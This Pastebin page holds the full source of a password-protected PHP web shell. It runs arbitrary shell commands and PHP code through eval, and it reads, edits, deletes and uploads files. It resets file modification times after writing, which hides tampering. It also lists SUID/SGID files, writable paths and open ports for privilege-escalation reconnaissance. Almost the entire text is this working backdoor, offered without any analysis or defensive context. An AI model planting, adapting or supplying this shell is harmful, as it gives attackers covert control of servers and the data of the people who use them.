API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 21st, 2010
205
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.70 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. clearstatcache ();
  3. set_magic_quotes_runtime ( 0 );
  4. if (! function_exists ( 'ini_set' )) {
  5.     function ini_set() {
  6.         return FALSE;
  7.     }
  8. }
  9. ini_set ( 'output_buffering', 0 );
  10. if (@set_time_limit ( 0 ) || ini_set ( 'max_execution_time', 0 ))
  11.     $limit = 'not limited';
  12. else
  13.     $limit = get_cfg_var ( 'max_execution_time' );
  14. if (isset ( $HTTP_SERVER_VARS ) && ! isset ( $_SERVER )) {
  15.     $_POST = &$HTTP_POST_VARS;
  16.     $_GET = &$HTTP_GET_VARS;
  17.     $_SERVER = &$HTTP_SERVER_VARS;
  18. }
  19. if (@get_magic_quotes_gpc ()) {
  20.     foreach ( $_POST as $k => $v )
  21.         $_POST [$k] = stripslashes ( $v );
  22.     foreach ( $_SERVER as $k => $v )
  23.         $_SERVER [$k] = stripslashes ( $v );
  24. }
  25. if (! isset ( $_GET ['z'] ) || md5 ( $_GET ['z'] ) !== '95e1ebd665d6df61319c938b954f913c')
  26.     die ();
  27. function execute($c) {
  28.     if (function_exists ( 'exec' )) {
  29.         @exec ( $c, $out );
  30.         return @implode ( "\n", $out );
  31.     } elseif (function_exists ( 'shell_exec' )) {
  32.         $out = @shell_exec ( $c );
  33.         return $out;
  34.     } elseif (function_exists ( 'system' )) {
  35.         @ob_start ();
  36.         @system ( $c, $ret );
  37.         $out = @ob_get_contents ();
  38.         @ob_end_clean ();
  39.         return $out;
  40.     } elseif (function_exists ( 'passthru' )) {
  41.         @ob_start ();
  42.         @passthru ( $c, $ret );
  43.         $out = @ob_get_contents ();
  44.         @ob_end_clean ();
  45.         return $out;
  46.     } else {
  47.         return FALSE;
  48.     }
  49. }
  50. function read($f) {
  51.     $str = @file ( $f );
  52.     if ($str) {
  53.         $out = implode ( '', $str );
  54.     } elseif (function_exists ( 'curl_version' )) {
  55.         @ob_start ();
  56.         $h = @curl_init ( 'file:/' . '/' . $f );
  57.         @curl_exec ( $h );
  58.         $out = @ob_get_contents ();
  59.         @ob_end_clean ();
  60.     } else {
  61.         $out = 'Could not read file!';
  62.     }
  63.     return htmlspecialchars ( $out );
  64. }
  65. function write($f, $c) {
  66.     $t = filemtime ( $f );
  67.     $fp = @fopen ( $f, 'w' );
  68.     if ($fp) {
  69.         fwrite ( $fp, $c );
  70.         fclose ( $fp );
  71.         $out = 'File saved.' . "\n";
  72.         if ($t && touch ( $f, $t )) {
  73.             $out .= 'Last modification
  74. time changed.';
  75.         } else {
  76.             $out .= 'Could not change last modification
  77. time!';
  78.         }
  79.     } else {
  80.         $out = 'Saving failed!';
  81.     }
  82.     return $out;
  83. }
  84. function file_size($f) {
  85.     $size = filesize ( $f );
  86.     if ($size < 1024)
  87.         $size = $size . '&nbsp;b';
  88.     elseif ($size < 1048576)
  89.         $size = round ( $size / 1024 * 100 ) / 100 . '&nbsp;Kb';
  90.     elseif ($size < 1073741824)
  91.         $size = round ( $size / 1048576 * 100 ) / 100 . '&nbsp;Mb';
  92.     return $size;
  93. }
  94. $zzz = $_POST ['zzz'];
  95. if (! function_exists ( 'natcasesort' )) {
  96.     function natcasesort($arr) {
  97.         return sort ( $arr );
  98.     }
  99. }
  100. if (! empty ( $_POST ['dir'] )) {
  101.     $dir = $_POST ['dir'];
  102.     if (! @chdir ( $dir ))
  103.         $out = 'chdir() failled!';
  104. }
  105. $dir = getcwd ();
  106. (strlen ( $dir ) > 1 && $dir [1] == ':') ? $os_type = 'win' : $os_type = 'nix';
  107. if (! $os_name = @php_uname ()) {
  108.     if (function_exists ( 'posix_uname' )) {
  109.         $os_name = posix_uname ();
  110.     } elseif ($os_name != getenv ( 'OS' )) {
  111.         $os_name = '';
  112.     }
  113. }
  114.  
  115. if (function_exists ( 'posix_getpwuid' )) {
  116.     $data = posix_getpwuid ( posix_getuid () );
  117.     $user = $data ['name'] . '
  118. uid(' . $data ['uid'] . ') gid(' . $data ['gid'] . ')';
  119. } else {
  120.     $user = '';
  121. }
  122.  
  123. $safe_mode = get_cfg_var ( 'safe_mode' );
  124. $safe_mode ? $safe = 'on' : $safe = 'off';
  125. execute ( 'echo ssps' ) ? $execute = 'on' : $execute = 'off';
  126.  
  127. $server = getenv ( 'SERVER_SOFTWARE' );
  128. if (! $server)
  129.     $server = '---';
  130. $out = '';
  131. $tail = '';
  132. $aliases = '';
  133. if (! $safe_mode) {
  134.     if ($os_type == 'nix') {
  135.         $os .= execute ( 'sysctl -n kern.ostype' );
  136.         $os .= execute ( 'sysctl -n
  137. kern.osrelease' );
  138.         $os .= execute ( 'sysctl -n kernel.ostype' );
  139.         $os .= execute ( 'sysctl -n kernel.osrelease' );
  140.         if (empty ( $user ))
  141.             $user = execute ( 'id' );
  142.         $aliases = array ('' => '', 'find suid files' => 'find /
  143. -type f -perm -04000 -ls', 'find sgid files' => 'find / -type f -perm
  144. -02000 -ls', 'find all writable files in current dir' => 'find . -type f
  145. -perm -2 -ls', 'find all writable directories in current dir' => 'find .
  146. -type d -perm -2 -ls', 'find all writable directories and files in
  147. current dir' => 'find . -perm -2 -ls', 'show opened ports' => 'netstat -an |
  148. grep -i listen' );
  149.     } else {
  150.         $os_name .= execute ( 'ver' );
  151.         $user .= execute ( 'echo %username%' );
  152.         $aliases = array ('' => '', 'show runing
  153. services' => 'net start', 'show process list' => 'tasklist' );
  154.     }
  155. }
  156.  
  157. print <<<here
  158.     <style>
  159. table {font:9pt Tahoma;border-color:white}
  160. input,select,file {background-color:#eeeeee}
  161. textarea {background-color:#f2f2f2}
  162. </style>
  163.     <br>
  164. <center>
  165. <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver>
  166. <tr>
  167. <td>
  168. <form method=post>
  169. <table cellpadding=1 cellspacing=0 border=1 width=650>
  170. here;
  171.  
  172. if (empty ( $zzz ) || md5 ( $zzz ) !== 'a841b9908eac74475729ae0be846d1b6') {
  173.     print <<<here
  174. <tr>
  175. <td align=center>
  176. <input type=text name=zzz size=16 value="{$zzz}">
  177. </td>
  178. </tr>
  179. </table>
  180. here;
  181.     die ();
  182. }
  183.  
  184. if (! empty ( $_POST ['cmd'] )) {
  185.     $out = execute ( $_POST ['cmd'] );
  186. }
  187.  
  188. elseif (! empty ( $_POST ['php'] )) {
  189.     ob_start ();
  190.     eval ( $_POST ['php'] );
  191.     $out = ob_get_contents ();
  192.     ob_end_clean ();
  193. }
  194.  
  195. elseif (! empty ( $_POST ['edit'] )) {
  196.     $file = $_POST ['edit'];
  197.     $out = read ( $file );
  198.     $tail = '<input type=hidden name=dir value="' . $dir . '"><input type=hidden name=efile value="' . $file . '"><br><input type=submit>';
  199. }
  200.  
  201. elseif (! empty ( $_POST ['save'] )) {
  202.     $out = write ( $_POST ['efile'], $_POST ['save'] );
  203. }
  204.  
  205. elseif (! empty ( $_POST ['remove'] )) {
  206.     $obj = $_POST ['remove'];
  207.     @is_dir ( $obj ) ? $res = @rmdir ( $obj ) : $res = @unlink ( $obj );
  208.     $res ? $out = 'Removed successfully' : $out = 'Removing failed!';
  209. }
  210.  
  211. elseif (! empty ( $_POST ['newdir'] )) {
  212.     @mkdir ( $_POST ['newdir'] ) ? $out = 'Directory created.' : $out = 'Could not create directory!';
  213. }
  214.  
  215. elseif (! empty ( $_POST ['newfile'] )) {
  216.     @touch ( $_POST ['newfile'] ) ? $out = 'File created.' : $out = 'Could not create file!';
  217. }
  218.  
  219. elseif (! empty ( $_POST ['alias'] )) {
  220.     $out = execute ( $_POST ['alias'] );
  221. }
  222.  
  223. elseif (! empty ( $_FILES ['ufile'] ['tmp_name'] )) {
  224.     if (! is_uploaded_file ( $_FILES ['ufile'] ['tmp_name'] ) || @! copy ( $_FILES ['ufile'] ['tmp_name'], $dir . chr ( 47 ) . $_FILES ['ufile'] ['name'] ))
  225.         $out = 'Could not upload file';
  226.     else
  227.         $out = 'Uploaded successfully.';
  228. }
  229.  
  230. if (! $safe_mode)
  231.     print <<<here
  232. <tr>
  233. <td>
  234. cmd
  235. </td>
  236. <td colspan=8 nowrap>
  237. <input type=text name=cmd size=97>
  238. <input type=hidden name=zzz value="{$zzz}">
  239. </td>
  240. </tr>
  241. here;
  242. print <<<here
  243. <tr>
  244. <td>
  245. php
  246. </td>
  247. <td colspan=8>
  248. <input type=text name=php size=97>
  249. </td>
  250. </tr>
  251. <tr>
  252. <td>
  253. actions
  254. </td>
  255. <td>
  256. edit
  257. </td>
  258. <td>
  259. <input type=text name=edit size=14>
  260. </td>
  261. <td>
  262. remove
  263. </td>
  264. <td>
  265. <input type=text name=remove size=14>
  266. </td>
  267. <td>
  268. new_dir
  269. </td>
  270. <td>
  271. <input type=text name=newdir size=14>
  272. </td>
  273. <td>
  274. new_file
  275. </td>
  276. <td>
  277. <input type=text name=newfile size=15>
  278. </td>
  279. </tr>
  280. here;
  281. if ($aliases) {
  282.     print <<<here
  283. <tr>
  284. <td>
  285. aliases
  286. </td>
  287. <td colspan=8>
  288. <select name=alias>
  289. here;
  290.     foreach ( $aliases as $k => $v ) {
  291.         print '<option value="' . $v . '">' . $k . '</option>';
  292.     }
  293.     print <<<here
  294.  
  295. </select>
  296. <input type=submit>
  297. </td>
  298. </tr>
  299. here;
  300. }
  301. print <<<here
  302. <tr>
  303. <td>
  304. dir
  305. </td>
  306. <td colspan=8>
  307. <input type=text value="{$dir}" name=dir size=97>
  308. </td>
  309. </tr>
  310. </form>
  311.  
  312. <form method=post enctype=multipart/form-data>
  313. <tr>
  314. <td>
  315. upload
  316. </td>
  317. <td colspan=8>
  318. <input type=file name=ufile size=60>&nbsp;&nbsp;<input type=submit value="Upload">
  319. <input type=hidden name=dir value="{$dir}">
  320. <input type=hidden name=zzz value="{$zzz}">
  321. </td>
  322. </tr>
  323. </form>
  324. </table>
  325.  
  326. <table cellpadding=0 cellspacing=0 border=1 width=650>
  327. <form method=post>
  328. <tr valign=top>
  329. <td width=70% bgcolor=#dddddd>
  330. <b>OS:</b> {$os_name}<br>
  331. <b>User:</b> {$user}<br>
  332. <b>Server:</b> {$server}<br>
  333. <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit}
  334. <input type=hidden name=zzz value="{$zzz}">
  335. </td>
  336. <td rowspan=2 bgcolor=#dddddd>
  337. here;
  338.  
  339. if ($dp = @openDir ( $dir )) {
  340.     $cObj = readDir ( $dp );
  341.     while ( $cObj ) {
  342.         if (@is_dir ( $cObj ))
  343.             $theDirs [] = $cObj;
  344.         elseif (@is_file ( $cObj ))
  345.             $theFiles [] = $cObj;
  346.         $cObj = readDir ( $dp );
  347.     }
  348.     closedir ( $dp );
  349. }
  350.  
  351. if (! empty ( $theDirs )) {
  352.     natcasesort ( $theDirs );
  353.     if ($os_type == 'nix') {
  354.         foreach ( $theDirs as $cDir ) {
  355.             $color = 'black';
  356.             if (is_writeable ( $cDir )) {
  357.                 $color = 'red';
  358.             } elseif (is_readable ( $cDir )) {
  359.                 $color = 'blue';
  360.             }
  361.             print "<font color=" . $color . ">&lt;" . $cDir . "&gt;</font><br>";
  362.         }
  363.     } else {
  364.         foreach ( $theDirs as $cDir ) {
  365.             $tmp = $cDir . '/.ssps_tmp';
  366.             if (@touch ( $tmp )) {
  367.                 $color = 'red';
  368.                 unlink ( $tmp );
  369.             } elseif (opendir ( $cDir )) {
  370.                 closedir ();
  371.                 $color = 'blue';
  372.             } else {
  373.                 $color = 'black';
  374.             }
  375.             print "<font color=" . $color . ">&lt;" . $cDir . "&gt;</font><br>";
  376.         }
  377.     }
  378. } else
  379.     print '<br>open_basedir restriction in effect. Allowed path is ' . get_cfg_var ( 'open_basedir' );
  380.  
  381. print '<br>';
  382.  
  383. if (! empty ( $theFiles )) {
  384.     natcasesort ( $theFiles );
  385.     print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">';
  386.     foreach ( $theFiles as $cFile ) {
  387.         $size = file_size ( $cFile );
  388.         if ($fp = @fopen ( $cFile, 'a' ))
  389.             $color = 'red';
  390.         elseif ($fp = @fopen ( $cFile, 'r' ))
  391.             $color = 'blue';
  392.         else
  393.             $color = 'black';
  394.         @fclose ( $fp );
  395.         print '<tr><td width=100%><font color=' . $color . '>' . $cFile . '</font></td><td align=left>' . $size . '</tr>';
  396.     }
  397.     print '</table>';
  398. }
  399.  
  400. print <<<here
  401. </td>
  402. </tr>
  403. ?>
  404. <tr valign=top>
  405. <td align=center>
  406. <form method=post>
  407. results:
  408. <textarea name=save cols=55 rows=15>{$out}</textarea>
  409. {$tail}
  410. <input type=hidden name=zzz value="{$zzz}">
  411. </form>
  412. </td>
  413. </tr>
  414.  
  415. </table>
  416. </form>
  417. </td>
  418. </tr>
  419. </table>
  420. here;
  421. die ();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!